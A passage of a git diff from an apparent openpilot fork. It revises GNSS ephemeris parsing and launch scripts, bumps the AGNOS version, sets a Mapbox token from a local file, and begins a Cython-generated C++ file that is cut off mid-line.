.gps_time import GPSTime, utc_to_gpst from .constants import SPEED_OF_LIGHT, SECS_IN_MIN, SECS_IN_HR, SECS_IN_DAY, \ - SECS_IN_WEEK, EARTH_ROTATION_RATE, EARTH_GM + EARTH_ROTATION_RATE, EARTH_GM from .helpers import get_constellation, get_prn_from_nmea_id import capnp @@ -479,17 +479,12 @@ def parse_rinex_nav_msg_glonass(file_name): return ephems -def parse_qcom_ephem(qcom_poly, current_week): +def parse_qcom_ephem(qcom_poly): svId = qcom_poly.svId - data = qcom_poly - t0 = data.t0 - # fix glonass time prn = get_prn_from_nmea_id(svId) - if prn[0] == 'R': - # TODO should handle leap seconds better - epoch = GPSTime(current_week, (t0 - 3*SECS_IN_HR + SECS_IN_DAY) % (SECS_IN_WEEK) + 18) - else: - epoch = GPSTime(current_week, t0) + epoch = GPSTime(qcom_poly.gpsWeek, qcom_poly.gpsTow) + + data = qcom_poly poly_data = {} poly_data['t0'] = epoch poly_data['xyz'] = np.array([ diff --git a/launch_chffrplus.sh b/launch_chffrplus.sh index 871c8c8ba..b6fb30ede 100755 --- a/launch_chffrplus.sh +++ b/launch_chffrplus.sh @@ -9,6 +9,12 @@ source "$BASEDIR/launch_env.sh" DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )" function agnos_init { + # openpilot ssh key installer + if [ ! -f /data/params/d/GithubSshKeys ]; then + echo -n openpilot > /data/params/d/GithubUsername + cat /usr/comma/setup_keys > /data/params/d/GithubSshKeys + fi + # wait longer for weston to come up if [ -f "$BASEDIR/prebuilt" ]; then sleep 3 @@ -74,14 +80,7 @@ function launch { # handle pythonpath ln -sfn $(pwd) /data/pythonpath - export PYTHONPATH="$PWD:$PWD/pyextra" - - # dp - apply custom patch - if [ -f "/data/media/0/dp_patcher.py" ]; then - python /data/media/0/dp_patcher.py - fi - # dp - install default ssh key - python /data/openpilot/scripts/sshkey_installer.py + export PYTHONPATH="$PWD" # hardware specific init agnos_init @@ -91,16 +90,7 @@ function launch { # start manager cd selfdrive/manager - if [ -f /data/params/d/OsmLocal ]; then - OSM_LOCAL=`cat /data/params/d/OsmLocal` - else - OSM_LOCAL="0" - fi - if [ $OSM_LOCAL = "1" ]; then - ./custom_dep.py && ./build.py && ./local_osm_install.py && ./manager.py - else - ./custom_dep.py && ./build.py && ./manager.py - fi + ./custom_dep.py && ./build.py && ./manager.py # if broken, keep on screen error while true; do sleep 1; done diff --git a/launch_env.sh b/launch_env.sh index c1ecbe3b3..197460eb0 100755 --- a/launch_env.sh +++ b/launch_env.sh @@ -7,7 +7,7 @@ export OPENBLAS_NUM_THREADS=1 export VECLIB_MAXIMUM_THREADS=1 if [ -z "$AGNOS_VERSION" ]; then - export AGNOS_VERSION="7.1" + export AGNOS_VERSION="8.2" fi if [ -z "$PASSIVE" ]; then @@ -15,3 +15,12 @@ if [ -z "$PASSIVE" ]; then fi export STAGING_ROOT="/data/safe_staging" + +### dp_stock_begin ### +if [ -f /data/media/0/dp_nav_mapbox_token ]; then + token=$(cat /data/media/0/dp_nav_mapbox_token) + if [ "$token" != "" ]; then + export MAPBOX_TOKEN=$token + fi +fi +### dp_stock_end ### diff --git a/opendbc/can/libdbc.so b/opendbc/can/libdbc.so index 660a4bb8c..a15570aa0 100755 Binary files a/opendbc/can/libdbc.so and b/opendbc/can/libdbc.so differ diff --git a/opendbc/can/packer_pyx.cpp b/opendbc/can/packer_pyx.cpp new file mode 100644 index 000000000..88dcb7c52 --- /dev/null +++ b/opendbc/can/packer_pyx.cpp @@ -0,0 +1,8980 @@ +/* Generated by Cython 3.0.0 */ + +/* BEGIN: Cython Metadata +{ + "distutils": { + "depends": [ + "opendbc/can/common.h", + "opendbc/can/common_dbc.h" + ], + "include_dirs": [ + "opendbc/can" + ], + "language": "c++", + "name": "opendbc.can.packer_pyx", + "sources": [ + "/data/openpilot/opendbc/can/packer_pyx.pyx" + ] + }, + "module_name": "opendbc.can.packer_pyx" +} +END: Cython Metadata */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef __cplusplus + #error "Cython files generated with the C++ option must be compiled with a C++ compiler." +#endif +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #else + #define CYTHON_INLINE inline + #endif +#endif +template +void __Pyx_call_destructor(T& x) { + x.~T(); +} +template +class __Pyx_FakeReference { + public: + __Pyx_FakeReference() : ptr(NULL) { } + __Pyx_FakeReference(const T& ref) : ptr(const_cast(&ref)) { } + T *operator->() { return ptr; } + T *operator&() { return ptr; } + operator T&() { return *ptr; } + template bool operator ==(const U& other) const { return *ptr == other; } + template bool operator !=(const U& other) const { return *ptr != other; } + template bool operator==(const __Pyx_FakeReference& other) const { return *ptr == *other.ptr; } + template bool operator!=(const __Pyx_FakeReference& other) const { return *ptr != *other.ptr; } + private: + T *ptr; +}; + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const 